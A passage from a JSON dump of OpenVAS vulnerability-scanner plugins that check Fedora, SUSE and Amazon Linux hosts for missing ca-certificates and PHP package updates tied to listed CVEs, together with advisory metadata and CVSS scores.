"bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388"], "description": "The remote host is missing an update for the ", "modified": "2020-06-24T00:00:00", "published": "2020-06-23T00:00:00", "id": "OPENVAS:1361412562310877982", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877982", "type": "openvas", "title": "Fedora: Security Advisory for ca-certificates (FEDORA-2020-fb144e7de5)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877982\");\n script_version(\"2020-06-24T03:42:18+0000\");\n script_cve_id(\"CVE-2005-3388\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-24 03:42:18 +0000 (Wed, 24 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-23 03:19:58 +0000 (Tue, 23 Jun 2020)\");\n script_name(\"Fedora: Security Advisory for ca-certificates (FEDORA-2020-fb144e7de5)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC32\");\n\n script_xref(name:\"FEDORA\", value:\"2020-fb144e7de5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PIRZJHM6UDNWNHZ3PCMEZ2YUK3CWY2UE\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ca-certificates'\n package(s) announced via the FEDORA-2020-fb144e7de5 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This package contains the set of CA certificates chosen by the\nMozilla Foundation for use with the Internet PKI.\");\n\n script_tag(name:\"affected\", value:\"'ca-certificates' package(s) on Fedora 32.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC32\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ca-certificates\", rpm:\"ca-certificates~2020.2.41~1.1.fc32\", rls:\"FC32\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-26T08:56:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65581", "href": "http://plugins.openvas.org/nasl.php?oid=65581", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014967.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65581);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\", \"CVE-2005-3883\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-mod_php4\", rpm:\"apache-mod_php4~4.3.4~43.46.8\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065581", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065581", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014967.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65581\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\", \"CVE-2005-3883\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-mod_php4\", rpm:\"apache-mod_php4~4.3.4~43.46.8\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T22:58:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120450", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-464)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120450\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:39 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-464)\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 .\");\n script_tag(name:\"solution\", value:\"Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-464.html\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2004-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-imap\", rpm:\"php55-imap~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.20~2.94.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:59:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120454", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120454", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-463)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120454\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-463)\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 .\");\n script_tag(name:\"solution\", value:\"Run yum update php54 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-463.html\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2004-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php54-bcmath\", rpm:\"php54-bcmath~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-odbc\", rpm:\"php54-odbc~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pdo\", rpm:\"php54-pdo~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mcrypt\", rpm:\"php54-mcrypt~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pspell\", rpm:\"php54-pspell~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-snmp\", rpm:\"php54-snmp~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-xmlrpc\", rpm:\"php54-xmlrpc~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-debuginfo\", rpm:\"php54-debuginfo~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-common\", rpm:\"php54-common~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-devel\", rpm:\"php54-devel~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mssql\", rpm:\"php54-mssql~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-embedded\", rpm:\"php54-embedded~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mbstring\", rpm:\"php54-mbstring~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-cli\", rpm:\"php54-cli~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-soap\", rpm:\"php54-soap~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-process\", rpm:\"php54-process~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mysql\", rpm:\"php54-mysql~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-ldap\", rpm:\"php54-ldap~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mysqlnd\", rpm:\"php54-mysqlnd~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-tidy\", rpm:\"php54-tidy~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54\", rpm:\"php54~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-gd\", rpm:\"php54-gd~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-xml\", rpm:\"php54-xml~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pgsql\", rpm:\"php54-pgsql~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-recode\", rpm:\"php54-recode~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-intl\", rpm:\"php54-intl~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-dba\", rpm:\"php54-dba~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-enchant\", rpm:\"php54-enchant~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-imap\", rpm:\"php54-imap~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-fpm\", rpm:\"php54-fpm~5.4.36~1.64.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1065", "CVE-2004-1019"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200412-14.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54773", "href": "http://plugins.openvas.org/nasl.php?oid=54773", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200412-14 (PHP)", 